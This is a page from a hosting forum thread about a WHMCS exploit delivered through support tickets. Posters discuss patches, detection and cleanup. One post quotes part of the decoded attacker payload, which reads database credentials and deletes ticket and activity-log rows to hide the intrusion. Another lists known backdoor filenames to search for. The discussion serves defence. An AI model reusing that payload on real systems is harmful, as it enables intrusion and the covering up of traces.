Page 3 of 14 FirstFirst 12345613 ... LastLast
Results 31 to 45 of 199
  1. #31
    Join Date
    Feb 2003
    Location
    Cumbernauld, Scotland, UK
    Posts
    732
    Quote Originally Posted by cpoalmighty View Post
    Isn't dl a standard WHMCS file?
    What do we have to look for specifically?
    Yes, dl.php is a WHMCS system file
    Look at the date of the files on FTP
    If they have the same date as the support ticket then you know it has been compromised

    As I posted some time ago, the exploit assumes eval is ON
    My solution was to turn eval OFF
    Obviously if you need to use eval in php then you need to apply the patch

    Equally, only my customers can submit support tickets
    As a result this attacker had to register as a new customer first
    Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!
    M8 INTERNET : Simple and cost effective website hosting from the UK
    M8 INTERNET : Google Ads Account Management

  2. #32
    Join Date
    Mar 2009
    Posts
    2,310
    Quote Originally Posted by bear View Post
    The solution appears to be to apply the patch and possibly block subjects that begin with that tag. If you have a mod_sec rule that defeats this, that should be no problem.
    Hi,i use whm/cpanel and install whmcs on it,can i ask how do you use mod_sec rule to secure it more ? thanx

  3. #33
    Join Date
    Apr 2009
    Location
    OnTheWeb
    Posts
    2,017
    Quote Originally Posted by m8internet View Post
    Yes, dl.php is a WHMCS system file
    Look at the date of the files on FTP
    If they have the same date as the support ticket then you know it has been compromised

    As I posted some time ago, the exploit assumes eval is ON
    My solution was to turn eval OFF
    Obviously if you need to use eval in php then you need to apply the patch

    Equally, only my customers can submit support tickets
    As a result this attacker had to register as a new customer first
    Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!
    Good detective work

    I'm safe because I just double checked it (that means that the patch is working )

    <<<snipped my content >>>
    If you're the smartest person in the room then you're in the wrong room

  4. #34
    This is really a great security issue is WHMCS rolled out any patch for it

    Quote Originally Posted by DewlanceHosting View Post
    I decode his code through base 64decoder..



    $text=file_get_contents("configuration.php");
    REMOVED.....
    eval($text);

    $db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
    mysql_select_db($db_name) or die("Can't select database");
    $delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
    mysql_query($delete);
    $delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
    REMOVED!!!!! so others will not use this...

  5. #35
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,576
    Quote Originally Posted by msam029 View Post
    This is really a great security issue is WHMCS rolled out any patch for it
    Weeks ago, don't tell me you haven't been paying attention to any of the MANY notices about it - on here, in WHMCS itself, on their site, in their forums ...

  6. #36
    Join Date
    Feb 2007
    Location
    Federal Heights, CO
    Posts
    1,846
    Just wanted to add some more info to this thread. Initial exploit attempts against us were trying to place a file called b0x.php in the following directories:
    Code:
    templates_c
    images
    A quick way to search for the known exploit files:
    Code:
    find / | grep b0x.php
    find / | grep dl.php
    find / | grep wh.php
    find / | grep xfr.php
    find / | grep sss.php
    find / | grep ed8.php
    find / | grep test.php
    find / | grep red.php
    Just a heads up.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  7. #37
    Join Date
    May 2009
    Location
    United Kingdom
    Posts
    1,312
    Thanks for the heads up Joe!
    Zomex & Template Genie ~ In business since 2009 and still going strong!
    █ #1 Responsive Web hosting templates | WHMCS | Wordpress | HTML5 | Settings area
    █ A 5 step guide on > how to start a web hosting reseller business

  8. #38
    The attackers keep trying to exploit our WHMCS, a couple of tickets a week. Unfortunately for them it was patched from day one of the exploit. I have had to disable them and allow they for clients only.

    - Ashton
    Ashton Allen | FuseWeb Limited
    Premium UK Webhosting
    | Shared Hosting | VPS | Reseller Hosting | VOIP |
    FuseWeb.co.uk Or follow us on Twitter

  9. #39
    Join Date
    Aug 2009
    Location
    LAX, DAL, MIA
    Posts
    3,308
    We get about 5 of these tickets a day. Patched it the day the email was received from WHMCS about it. It's most likely going to be an on-going issue (Receiving the emails meaning) for a couple of months until they realize all of the legitimate WHMCS setups have been patched.
    〓〓 QuadraNet ├ CLOUD ├ DEDICATED ├ COLOCATION
    〓〓 Locations: Los Angeles, Dallas and Miami!!
    〓〓 andrew.moore[at]quadranet.com
    〓〓 http://www.QuadraNet.com

  10. #40
    Join Date
    Dec 2004
    Posts
    461
    Quote Originally Posted by almanox View Post
    Disabling php tag has been one of the security features of smarty templates for years. Weird it created issues just now. I used to believe it was disabled in such serious projects as billing systems but seems like it was not at least in email/ticket parsing code.
    I do not think the vulnerability is in the ticket code itself, but elsewhere.

    A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.

    So I assume the ticket facility is merely used as a way to get a file uploaded, that is later executed by using the vulnerability.

    Be aware that there may be other ways for an attacker to get a file uploaded on your system (e.g. through another website hosted on the same webserver).
    So people should not assume they are secure because they disabled their ticket system, or set it to "customers only"
    Make sure you applied the patch instead.


    BTW it seems WHMCS uses {php} in their own templates as well:

    Code:
    $ grep -R "{php}" *
    orderforms/boxes/products.tpl:{php}
    orderforms/boxes/configureproductdomain.tpl:www. <input type="text" name="sld[2]" size="40" value="{$sld}" /> . <input type="text" name="tld[2]" size="7" value="{php}
    So disabling code execution in smarty, might break legitimate functionality.

  11. #41
    Join Date
    Oct 2009
    Location
    Chicago, Illinois
    Posts
    60
    Alright, this is whats up.

    Most of you have been getting these, and don't know what is happening.

    First of all, run through all of your logs, check IP's of admins logged, and actions executed.

    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.

    Patching this, doesn't mean you are now safe and secure. What I have been seeing mostly is that the hackers have exploited and injected a backdoor page. This page can be ANYWHERE on your website. It is a page that decrypts your admin password, and pretty much anything in your system.

    The solutions:
    EASIEST: Backup your database, and DELETE EVERYTHING from your public_html to make sure you delete the backdoor file that was injected. Then download the newest most stable release of WHMCS, and attach it to your DB. Make sure to change ALL PASSWORDS. That includes admin, sql passwords, sql username passwords, ect.. Also change your database name and username that connects to the database. This will make sure that the backdoors have been deleted and you are now up-to-date with new passwords, and all the patched files. Lastly, if you have regular index.php files on your web server that is not attached to WHMCS, look through those files carefully for any of the possible injected code.


    The second option is just much more painful. This would include looking through every single file in your system and every single folder to find any compromised files.

    Hope this helps.

  12. #42
    Join Date
    Oct 2002
    Location
    Middle Dearth
    Posts
    20,887
    Quote Originally Posted by Maxnet View Post
    A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.
    That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.
    Quote Originally Posted by djeuro View Post
    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
    Hard to patch before the exploit was found.
    Having problems, or maybe questions about WHT? Head over to the help desk!


  13. #43
    Join Date
    Oct 2009
    Location
    Chicago, Illinois
    Posts
    60
    Quote Originally Posted by bear View Post
    That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.

    Hard to patch before the exploit was found.
    Well yes it's hard to patch it before exploit is found, that's why I just explained the steps to take now instead of saying people should have found it before the actual patch.

  14. #44
    Join Date
    Nov 2004
    Location
    Australia
    Posts
    1,576
    Quote Originally Posted by djeuro View Post
    This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
    Thanks for your post.

    Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.

  15. #45
    Join Date
    Oct 2009
    Location
    Chicago, Illinois
    Posts
    60
    Quote Originally Posted by brianoz View Post
    Thanks for your post.

    Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.
    I am actually more than willing to share the whole script with you guys since one of my sites were injected with this. The more we can see about it, the more we can patch.

    Contact me over PM.

Page 3 of 14 FirstFirst 12345613 ... LastLast

Similar Threads

  1. Replies: 3
    Last Post: 12-27-2011, 10:32 PM
  2. Replies: 0
    Last Post: 11-12-2010, 08:26 PM
  3. Replies: 3
    Last Post: 10-28-2010, 01:15 PM
  4. Replies: 1
    Last Post: 09-20-2010, 03:40 PM
  5. Replies: 0
    Last Post: 09-12-2010, 02:50 AM

Related Posts from theWHIR.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •